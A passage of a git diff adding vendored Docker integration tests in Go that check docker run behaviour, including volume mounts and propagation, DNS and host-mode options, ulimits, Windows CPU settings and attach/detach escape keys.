"slave-testfile"), []byte("Test"), 0644); err != nil { + c.Fatal(err) + } + + // Convert this directory into a shared mount point so that we do + // not rely on propagation properties of parent mount. + cmd := exec.Command("mount", "--bind", tmpDir, tmpDir) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-i", "-d", "--name", "parent", "-v", fmt.Sprintf("%s:/volume-dest:slave", tmpDir), "busybox", "top") + + // Bind mount tmpDir2/ onto tmpDir/mnt1. If mount propagates inside + // container then contents of tmpDir2/slave-testfile should become + // visible at "/volume-dest/mnt1/slave-testfile" + cmd = exec.Command("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1")) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "exec", "parent", "cat", "/volume-dest/mnt1/slave-testfile") + + mount.Unmount(path.Join(tmpDir, "mnt1")) + + if out != "Test" { + c.Fatalf("Bind mount under slave volume did not propagate to container") + } +} + +func (s *DockerSuite) TestRunNamedVolumesMountedAsShared(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, exitCode, _ := dockerCmdWithError("run", "-v", "foo:/test:shared", "busybox", "touch", "/test/somefile") + c.Assert(exitCode, checker.Not(checker.Equals), 0) + c.Assert(out, checker.Contains, "invalid mount config") +} + +func (s *DockerSuite) TestRunNamedVolumeCopyImageData(c *check.C) { + testRequires(c, DaemonIsLinux) + + testImg := "testvolumecopy" + _, err := buildImage(testImg, ` + FROM busybox + RUN mkdir -p /foo && echo hello > /foo/hello + `, true) + c.Assert(err, check.IsNil) + + dockerCmd(c, "run", "-v", "foo:/foo", testImg) + out, _ := dockerCmd(c, "run", "-v", "foo:/foo", "busybox", "cat", "/foo/hello") + c.Assert(strings.TrimSpace(out), check.Equals, "hello") +} + +func (s *DockerSuite) TestRunNamedVolumeNotRemoved(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "volume", "create", "test") + + dockerCmd(c, "run", "--rm", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") + dockerCmd(c, "volume", "inspect", "test") + out, _ := dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Equals, "test") + + dockerCmd(c, "run", "--name=test", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") + dockerCmd(c, "rm", "-fv", "test") + dockerCmd(c, "volume", "inspect", "test") + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Equals, "test") +} + +func (s *DockerSuite) TestRunNamedVolumesFromNotRemoved(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "run", "--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") + dockerCmd(c, "run", "--name=child", "--volumes-from=parent", "busybox", "true") + + // Remove the parent so there are not other references to the volumes + dockerCmd(c, "rm", "-f", "parent") + // now remove the child and ensure the named volume (and only the named volume) still exists + dockerCmd(c, "rm", "-fv", "child") + dockerCmd(c, "volume", "inspect", "test") + out, _ := dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Equals, "test") +} + +func (s *DockerSuite) TestRunAttachFailedNoLeak(c *check.C) { + nroutines, err := getGoroutineNumber() + c.Assert(err, checker.IsNil) + + runSleepingContainer(c, "--name=test", "-p", "8000:8000") + + // Wait until container is fully up and running + c.Assert(waitRun("test"), check.IsNil) + + out, _, err := dockerCmdWithError("run", "--name=fail", "-p", "8000:8000", "busybox", "true") + // We will need the following `inspect` to diagnose the issue if test fails (#21247) + out1, err1 := dockerCmd(c, "inspect", "--format", "{{json .State}}", "test") + out2, err2 := dockerCmd(c, "inspect", "--format", "{{json .State}}", "fail") + c.Assert(err, checker.NotNil, check.Commentf("Command should have failed but succeeded with: %s\nContainer 'test' [%+v]: %s\nContainer 'fail' [%+v]: %s", out, err1, out1, err2, out2)) + // check for windows error as well + // TODO Windows Post TP5. Fix the error message string + c.Assert(strings.Contains(string(out), "port is already allocated") || + strings.Contains(string(out), "were not connected because a duplicate name exists") || + strings.Contains(string(out), "HNS failed with error : Failed to create endpoint") || + strings.Contains(string(out), "HNS failed with error : The object already exists"), checker.Equals, true, check.Commentf("Output: %s", out)) + dockerCmd(c, "rm", "-f", "test") + + // NGoroutines is not updated right away, so we need to wait before failing + c.Assert(waitForGoroutines(nroutines), checker.IsNil) +} + +// Test for one character directory name case (#20122) +func (s *DockerSuite) TestRunVolumeWithOneCharacter(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-v", "/tmp/q:/foo", "busybox", "sh", "-c", "find /foo") + c.Assert(strings.TrimSpace(out), checker.Equals, "/foo") +} + +func (s *DockerSuite) TestRunVolumeCopyFlag(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support copying data from image to the volume + _, err := buildImage("volumecopy", + `FROM busybox + RUN mkdir /foo && echo hello > /foo/bar + CMD cat /foo/bar`, + true, + ) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "volume", "create", "test") + + // test with the nocopy flag + out, _, err := dockerCmdWithError("run", "-v", "test:/foo:nocopy", "volumecopy") + c.Assert(err, checker.NotNil, check.Commentf(out)) + // test default behavior which is to copy for non-binds + out, _ = dockerCmd(c, "run", "-v", "test:/foo", "volumecopy") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello") + // error out when the volume is already populated + out, _, err = dockerCmdWithError("run", "-v", "test:/foo:copy", "volumecopy") + c.Assert(err, checker.NotNil, check.Commentf(out)) + // do not error out when copy isn't explicitly set even though it's already populated + out, _ = dockerCmd(c, "run", "-v", "test:/foo", "volumecopy") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello") + + // do not allow copy modes on volumes-from + dockerCmd(c, "run", "--name=test", "-v", "/foo", "busybox", "true") + out, _, err = dockerCmdWithError("run", "--volumes-from=test:copy", "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) + out, _, err = dockerCmdWithError("run", "--volumes-from=test:nocopy", "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) + + // do not allow copy modes on binds + out, _, err = dockerCmdWithError("run", "-v", "/foo:/bar:copy", "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) + out, _, err = dockerCmdWithError("run", "-v", "/foo:/bar:nocopy", "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) +} + +// Test case for #21976 +func (s *DockerSuite) TestRunDNSInHostMode(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + expectedOutput := "nameserver 127.0.0.1" + expectedWarning := "Localhost DNS setting" + out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + c.Assert(stderr, checker.Contains, expectedWarning, check.Commentf("Expected warning on stderr about localhost resolver, but got %q", stderr)) + + expectedOutput = "nameserver 1.2.3.4" + out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + + expectedOutput = "search example.com" + out, _ = dockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + + expectedOutput = "options timeout:3" + out, _ = dockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + + expectedOutput1 := "nameserver 1.2.3.4" + expectedOutput2 := "search example.com" + expectedOutput3 := "options timeout:3" + out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out)) + c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out)) + c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out)) +} + +// Test case for #21976 +func (s *DockerSuite) TestRunAddHostInHostMode(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + expectedOutput := "1.2.3.4\textra" + out, _ := dockerCmd(c, "run", "--add-host=extra:1.2.3.4", "--net=host", "busybox", "cat", "/etc/hosts") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +func (s *DockerSuite) TestRunRmAndWait(c *check.C) { + dockerCmd(c, "run", "--name=test", "--rm", "-d", "busybox", "sh", "-c", "sleep 3;exit 2") + + out, code, err := dockerCmdWithError("wait", "test") + c.Assert(err, checker.IsNil, check.Commentf("out: %s; exit code: %d", out, code)) + c.Assert(out, checker.Equals, "2\n", check.Commentf("exit code: %d", code)) + c.Assert(code, checker.Equals, 0) +} + +// Test case for #23498 +func (s *DockerSuite) TestRunUnsetEntrypoint(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "test-entrypoint" + dockerfile := `FROM busybox +ADD entrypoint.sh /entrypoint.sh +RUN chmod 755 /entrypoint.sh +ENTRYPOINT ["/entrypoint.sh"] +CMD echo foobar` + + ctx, err := fakeContext(dockerfile, map[string]string{ + "entrypoint.sh": `#!/bin/sh +echo "I am an entrypoint" +exec "$@"`, + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo") + c.Assert(strings.TrimSpace(out), check.Equals, "foo") + + // CMD will be reset as well (the same as setting a custom entrypoint) + _, _, err = dockerCmdWithError("run", "--entrypoint=", "-t", name) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "No command specified") +} + +func (s *DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) { + c.Assert(s.d.StartWithBusybox("--debug", "--default-ulimit=nofile=65535"), checker.IsNil) + + name := "test-A" + _, err := s.d.Cmd("run", "--name", name, "-d", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(s.d.waitRun(name), check.IsNil) + + out, err := s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "[nofile=65535:65535]") + + name = "test-B" + _, err = s.d.Cmd("run", "--name", name, "--ulimit=nofile=42", "-d", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(s.d.waitRun(name), check.IsNil) + + out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "[nofile=42:42]") +} + +func (s *DockerSuite) TestRunStoppedLoggingDriverNoLeak(c *check.C) { + nroutines, err := getGoroutineNumber() + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("run", "--name=fail", "--log-driver=splunk", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out)) + + // NGoroutines is not updated right away, so we need to wait before failing + c.Assert(waitForGoroutines(nroutines), checker.IsNil) +} + +// Handles error conditions for --credentialspec. Validating E2E success cases +// requires additional infrastructure (AD for example) on CI servers. +func (s *DockerSuite) TestRunCredentialSpecFailures(c *check.C) { + testRequires(c, DaemonIsWindows) + attempts := []struct{ value, expectedError string }{ + {"rubbish", "invalid credential spec security option - value must be prefixed file:// or registry://"}, + {"rubbish://", "invalid credential spec security option - value must be prefixed file:// or registry://"}, + {"file://", "no value supplied for file:// credential spec security option"}, + {"registry://", "no value supplied for registry:// credential spec security option"}, + {`file://c:\blah.txt`, "path cannot be absolute"}, + {`file://doesnotexist.txt`, "The system cannot find the file specified"}, + } + for _, attempt := range attempts { + _, _, err := dockerCmdWithError("run", "--security-opt=credentialspec="+attempt.value, "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf("%s expected non-nil err", attempt.value)) + c.Assert(err.Error(), checker.Contains, attempt.expectedError, check.Commentf("%s expected %s got %s", attempt.value, attempt.expectedError, err)) + } +} + +// Windows specific test to validate credential specs with a well-formed spec. +// Note it won't actually do anything in CI configuration with the spec, but +// it should not fail to run a container. +func (s *DockerSuite) TestRunCredentialSpecWellFormed(c *check.C) { + testRequires(c, DaemonIsWindows, SameHostDaemon) + validCS := readFile(`fixtures\credentialspecs\valid.json`, c) + writeFile(filepath.Join(dockerBasePath, `credentialspecs\valid.json`), validCS, c) + dockerCmd(c, "run", `--security-opt=credentialspec=file://valid.json`, "busybox", "true") +} + +// Windows specific test to ensure that a servicing app container is started +// if necessary once a container exits. It does this by forcing a no-op +// servicing event and verifying the event from Hyper-V-Compute +func (s *DockerSuite) TestRunServicingContainer(c *check.C) { + testRequires(c, DaemonIsWindows, SameHostDaemon) + + out, _ := dockerCmd(c, "run", "-d", WindowsBaseImage, "cmd", "/c", "mkdir c:\\programdata\\Microsoft\\Windows\\ContainerUpdates\\000_000_d99f45d0-ffc8-4af7-bd9c-ea6a62e035c9_200 && sc control cexecsvc 255") + containerID := strings.TrimSpace(out) + err := waitExited(containerID, 60*time.Second) + c.Assert(err, checker.IsNil) + + cmd := exec.Command("powershell", "echo", `(Get-WinEvent -ProviderName "Microsoft-Windows-Hyper-V-Compute" -FilterXPath 'Event[System[EventID=2010]]' -MaxEvents 1).Message`) + out2, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil) + c.Assert(out2, checker.Contains, `"Servicing":true`, check.Commentf("Servicing container does not appear to have been started: %s", out2)) + c.Assert(out2, checker.Contains, `Windows Container (Servicing)`, check.Commentf("Didn't find 'Windows Container (Servicing): %s", out2)) + c.Assert(out2, checker.Contains, containerID+"_servicing", check.Commentf("Didn't find '%s_servicing': %s", containerID+"_servicing", out2)) +} + +func (s *DockerSuite) TestRunDuplicateMount(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + tmpFile, err := ioutil.TempFile("", "touch-me") + c.Assert(err, checker.IsNil) + defer tmpFile.Close() + + data := "touch-me-foo-bar\n" + if _, err := tmpFile.Write([]byte(data)); err != nil { + c.Fatal(err) + } + + name := "test" + out, _ := dockerCmd(c, "run", "--name", name, "-v", "/tmp:/tmp", "-v", "/tmp:/tmp", "busybox", "sh", "-c", "cat "+tmpFile.Name()+" && ls /") + c.Assert(out, checker.Not(checker.Contains), "tmp:") + c.Assert(out, checker.Contains, data) + + out = inspectFieldJSON(c, name, "Config.Volumes") + c.Assert(out, checker.Contains, "null") +} + +func (s *DockerSuite) TestRunWindowsWithCPUCount(c *check.C) { + testRequires(c, DaemonIsWindows) + + out, _ := dockerCmd(c, "run", "--cpu-count=1", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Equals, "testing") + + out = inspectField(c, "test", "HostConfig.CPUCount") + c.Assert(out, check.Equals, "1") +} + +func (s *DockerSuite) TestRunWindowsWithCPUShares(c *check.C) { + testRequires(c, DaemonIsWindows) + + out, _ := dockerCmd(c, "run", "--cpu-shares=1000", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Equals, "testing") + + out = inspectField(c, "test", "HostConfig.CPUShares") + c.Assert(out, check.Equals, "1000") +} + +func (s *DockerSuite) TestRunWindowsWithCPUPercent(c *check.C) { + testRequires(c, DaemonIsWindows) + + out, _ := dockerCmd(c, "run", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Equals, "testing") + + out = inspectField(c, "test", "HostConfig.CPUPercent") + c.Assert(out, check.Equals, "80") +} + +func (s *DockerSuite) TestRunProcessIsolationWithCPUCountCPUSharesAndCPUPercent(c *check.C) { + testRequires(c, DaemonIsWindows, IsolationIsProcess) + + out, _ := dockerCmd(c, "run", "--cpu-count=1", "--cpu-shares=1000", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Contains, "WARNING: Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded") + c.Assert(strings.TrimSpace(out), checker.Contains, "WARNING: Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. CPU percent discarded") + c.Assert(strings.TrimSpace(out), checker.Contains, "testing") + + out = inspectField(c, "test", "HostConfig.CPUCount") + c.Assert(out, check.Equals, "1") + + out = inspectField(c, "test", "HostConfig.CPUShares") + c.Assert(out, check.Equals, "0") + + out = inspectField(c, "test", "HostConfig.CPUPercent") + c.Assert(out, check.Equals, "0") +} + +func (s *DockerSuite) TestRunHypervIsolationWithCPUCountCPUSharesAndCPUPercent(c *check.C) { + testRequires(c, DaemonIsWindows, IsolationIsHyperv) + + out, _ := dockerCmd(c, "run", "--cpu-count=1", "--cpu-shares=1000", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Contains, "testing") + + out = inspectField(c, "test", "HostConfig.CPUCount") + c.Assert(out, check.Equals, "1") + + out = inspectField(c, "test", "HostConfig.CPUShares") + c.Assert(out, check.Equals, "1000") + + out = inspectField(c, "test", "HostConfig.CPUPercent") + c.Assert(out, check.Equals, "80") +} + +// Test for #25099 +func (s *DockerSuite) TestRunEmptyEnv(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectedOutput := "invalid environment variable:" + + out, _, err := dockerCmdWithError("run", "-e", "", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, expectedOutput) + + out, _, err = dockerCmdWithError("run", "-e", "=", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, expectedOutput) + + out, _, err = dockerCmdWithError("run", "-e", "=foo", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, expectedOutput) +} + +// #28658 +func (s *DockerSuite) TestSlowStdinClosing(c *check.C) { + name := "testslowstdinclosing" + repeat := 3 // regression happened 50% of the time + for i := 0; i < repeat; i++ { + cmd := exec.Command(dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat") + cmd.Stdin = &delayedReader{} + done := make(chan error, 1) + go func() { + _, err := runCommand(cmd) + done <- err + }() + + select { + case <-time.After(15 * time.Second): + c.Fatal("running container timed out") // cleanup in teardown + case err := <-done: + c.Assert(err, checker.IsNil) + } + } +} + +type delayedReader struct{} + +func (s *delayedReader) Read([]byte) (int, error) { + time.Sleep(500 * time.Millisecond) + return 0, io.EOF +} + +// #28823 (originally #28639) +func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + emptyDir, err := ioutil.TempDir("", "test-read-only-dev-shm") + c.Assert(err, check.IsNil) + defer os.RemoveAll(emptyDir) + out, _, err := dockerCmdWithError("run", "--rm", "--read-only", + "-v", fmt.Sprintf("%s:/dev/shm:ro", emptyDir), + "busybox", "touch", "/dev/shm/foo") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Read-only file system") +} + +// Test case for 29129 +func (s *DockerSuite) TestRunHostnameInHostMode(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectedOutput := "foobar\nfoobar" + out, _ := dockerCmd(c, "run", "--net=host", "--hostname=foobar", "busybox", "sh", "-c", `echo $HOSTNAME && hostname`) + c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go new file mode 100644 index 0000000000..e346c19f8e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go @@ -0,0 +1,1592 @@ +// +build !windows + +package main + +import ( + "bufio" + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "regexp" + "strconv" + "strings" + "syscall" + "time" + + "github.com/docker/docker/pkg/homedir" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/sysinfo" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// #6509 +func (s *DockerSuite) TestRunRedirectStdout(c *check.C) { + checkRedirect := func(command string) { + _, tty, err := pty.Open() + c.Assert(err, checker.IsNil, check.Commentf("Could not open pty")) + cmd := exec.Command("sh", "-c", command) + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + c.Assert(cmd.Start(), checker.IsNil) + ch := make(chan error) + go func() { + ch <- cmd.Wait() + close(ch) + }() + + select { + case <-time.After(10 * time.Second): + c.Fatal("command timeout") + case err := <-ch: + c.Assert(err, checker.IsNil, check.Commentf("wait err")) + } + } + + checkRedirect(dockerBinary + " run -i busybox cat /etc/passwd | grep -q root") + checkRedirect(dockerBinary + " run busybox cat /etc/passwd | grep -q root") +} + +// Test recursive bind mount works by default +func (s *DockerSuite) TestRunWithVolumesIsRecursive(c *check.C) { + // /tmp gets permission denied + testRequires(c, NotUserNamespace, SameHostDaemon) + tmpDir, err := ioutil.TempDir("", "docker_recursive_mount_test") + c.Assert(err, checker.IsNil) + + defer os.RemoveAll(tmpDir) + + // Create a temporary tmpfs mount. + tmpfsDir := filepath.Join(tmpDir, "tmpfs") + c.Assert(os.MkdirAll(tmpfsDir, 0777), checker.IsNil, check.Commentf("failed to mkdir at %s", tmpfsDir)) + c.Assert(mount.Mount("tmpfs", tmpfsDir, "tmpfs", ""), checker.IsNil, check.Commentf("failed to create a tmpfs mount at %s", tmpfsDir)) + + f, err := ioutil.TempFile(tmpfsDir, "touch-me") + c.Assert(err, checker.IsNil) + defer f.Close() + + runCmd := exec.Command(dockerBinary, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", "/tmp/tmpfs") + out, _, _, err := runCommandWithStdoutStderr(runCmd) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, filepath.Base(f.Name()), check.Commentf("Recursive bind mount test failed. Expected file not found")) +} + +func (s *DockerSuite) TestRunDeviceDirectory(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + if _, err := os.Stat("/dev/snd"); err != nil { + c.Skip("Host does not have /dev/snd") + } + + out, _ := dockerCmd(c, "run", "--device", "/dev/snd:/dev/snd", "busybox", "sh", "-c", "ls /dev/snd/") + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "timer", check.Commentf("expected output /dev/snd/timer")) + + out, _ = dockerCmd(c, "run", "--device", "/dev/snd:/dev/othersnd", "busybox", "sh", "-c", "ls /dev/othersnd/") + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "seq", check.Commentf("expected output /dev/othersnd/seq")) +} + +// TestRunDetach checks attaching and detaching with the default escape sequence. +func (s *DockerSuite) TestRunAttachDetach(c *check.C) { + name := "attach-detach" + + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", name) + stdout, err := cmd.StdoutPipe() + c.Assert(err, checker.IsNil) + cpty, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer cpty.Close() + cmd.Stdin = tty + c.Assert(cmd.Start(), checker.IsNil) + c.Assert(waitRun(name), check.IsNil) + + _, err = cpty.Write([]byte("hello\n")) + c.Assert(err, checker.IsNil) + + out, err := bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "hello") + + // escape sequence + _, err = cpty.Write([]byte{16}) + c.Assert(err, checker.IsNil) + time.Sleep(100 * time.Millisecond) + _, err = cpty.Write([]byte{17}) + c.Assert(err, checker.IsNil) + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + select { + case <-ch: + case <-time.After(10 * time.Second): + c.Fatal("timed out waiting for container to exit") + } + + running := inspectField(c, name, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) + + out, _ = dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c), "-f", "container="+name) + // attach and detach event should be monitored + c.Assert(out, checker.Contains, "attach") + c.Assert(out, checker.Contains, "detach") +} + +// TestRunDetach checks attaching and detaching with the escape sequence specified via flags. +func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) { + name := "attach-detach" + keyCtrlA := []byte{1} + keyA := []byte{97} + + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-a,a", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + c.Assert(waitRun(name), check.IsNil) + + if _, err := cpty.Write([]byte("hello\n")); err != nil { + c.Fatal(err) + } + + out, err := bufio.NewReader(stdout).ReadString('\n') + if err != nil { + c.Fatal(err) + } + if strings.TrimSpace(out) != "hello" { + c.Fatalf("expected 'hello', got %q", out) + } + + // escape sequence + if _, err := cpty.Write(keyCtrlA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + select { + case <-ch: + case <-time.After(10 * time.Second): + c.Fatal("timed out waiting for container to exit") + } + + running := inspectField(c, name, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) +} + +// TestRunDetach checks attaching and detaching with the escape sequence specified via flags. +func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) { + name := "attach-detach" + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "top") + c.Assert(waitRun(name), check.IsNil) + + // specify an invalid detach key, container will ignore it and use default + cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-A,a", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + + bufReader := bufio.NewReader(stdout) + out, err := bufReader.ReadString('\n') + if err != nil { + c.Fatal(err) + } + // it should print a warning to indicate the detach key flag is invalid + errStr := "Invalid escape keys (ctrl-A,a) provided" + c.Assert(strings.TrimSpace(out), checker.Equals, errStr) +} + +// TestRunDetach checks attaching and detaching with the escape sequence specified via config file. +func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) { + keyCtrlA := []byte{1} + keyA := []byte{97} + + // Setup config + homeKey := homedir.Key() + homeVal := homedir.Get() + tmpDir, err := ioutil.TempDir("", "fake-home") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + dotDocker := filepath.Join(tmpDir, ".docker") + os.Mkdir(dotDocker, 0600) + tmpCfg := filepath.Join(dotDocker, "config.json") + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpDir) + + data := `{ + "detachKeys": "ctrl-a,a" + }` + + err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) + c.Assert(err, checker.IsNil) + + // Then do the work + name := "attach-detach" + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + c.Assert(waitRun(name), check.IsNil) + + if _, err := cpty.Write([]byte("hello\n")); err != nil { + c.Fatal(err) + } + + out, err := bufio.NewReader(stdout).ReadString('\n') + if err != nil { + c.Fatal(err) + } + if strings.TrimSpace(out) != "hello" { + c.Fatalf("expected 'hello', got %q", out) + } + + // escape sequence + if _, err := cpty.Write(keyCtrlA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + select { + case <-ch: + case <-time.After(10 * time.Second): + c.Fatal("timed out waiting for container to exit") + } + + running := inspectField(c, name, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) +} + +// TestRunDetach checks attaching and detaching with the detach flags, making sure it overrides config file +func (s *DockerSuite) TestRunAttachDetachKeysOverrideConfig(c *check.C) { + keyCtrlA := []byte{1} + keyA := []byte{97} + + // Setup config + homeKey := homedir.Key() + homeVal := homedir.Get() + tmpDir, err := ioutil.TempDir("", "fake-home") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + dotDocker := filepath.Join(tmpDir, ".docker") + os.Mkdir(dotDocker, 0600) + tmpCfg := filepath.Join(dotDocker, "config.json") + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpDir) + + data := `{ + "detachKeys": "ctrl-e,e" + }` + + err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) + 